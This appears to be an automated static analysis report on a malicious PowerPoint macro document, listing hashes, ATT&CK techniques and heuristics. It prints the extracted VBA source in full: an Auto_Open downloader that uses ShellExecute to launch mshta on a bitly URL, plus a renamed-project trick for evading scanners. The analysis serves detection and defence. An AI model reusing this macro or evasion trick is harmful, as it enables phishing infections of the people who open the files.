Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 2c6ea9b40d366e1b…

MALICIOUS

Office (OOXML)

8.3 KB First seen: 2026-06-05
MD5: c84668aaa8f907ee0cc9d14c750480a3 SHA-1: 9f684bcb8e9961ce5d19ec1e22df6b2569ea9038 SHA-256: 2c6ea9b40d366e1baba060aacc15356154c80756d5e1a9883812d3ff510b671f
182 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample contains VBA macros, specifically an Auto_Open macro, which is designed to execute automatically when the document is opened. This macro uses CreateObject to instantiate 'Shell.Application' and then calls ShellExecute with a URL constructed from reversed characters, ultimately pointing to 'https://www.bitly.com/adjcsduhdhcioskocksmd'. This indicates an attempt to download and execute a secondary payload.

Heuristics 6

  • VBA project inside OOXML medium 4 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present (project part renamed away from vbaProject.bin: ppt/drxsycgcgv.b)
  • VBA project part renamed to evade filename detection high OOXML_VBA_PROJECT_RENAMED
    The VBA project is bound through the OOXML relationship/content type but its part is not named vbaProject.bin. Legitimate Office producers always emit vbaProject.bin; renaming it hides the macros from path-only scanners (observed in the SVCReady loader).
  • Auto_Open macro high OLE_VBA_AUTO
    Auto_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL https://www.bitly.com/adjcsduhdhcioskocksmd In document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 827 bytes
SHA-256: 3f12213198a2fc89509f5d54032a84b8a97e867b58aba80cabb71558af903ec8
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Module111"

Sub _
Auto_Open _
()
Dim MsgBox As New topli
Set Outlook = CreateObject("Outlook.Application")

Set Microsoft = Outlook.CreateObject("Shell.Application")

Microsoft.ShellExecute MsgBox.mill, MsgBox.link





End _
Sub


Attribute VB_Name = "topli"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function mill()
o = StrReverse("M")
m = StrReverse("s")
l = StrReverse("H")
a = StrReverse("t")
i = StrReverse("A")
mill = o + m + l + a + i
End Function
Function link()
link = "https://www.bitly.com/adjcsduhdhcioskocksmd"
End Function
vbaProject_00.bin vba-project OOXML VBA project: ppt/drxsycgcgv.b 17408 bytes
SHA-256: b752fef37bfbfff3681c48581c643375c6d1c071ebec4b33f48b6d73f5c80a16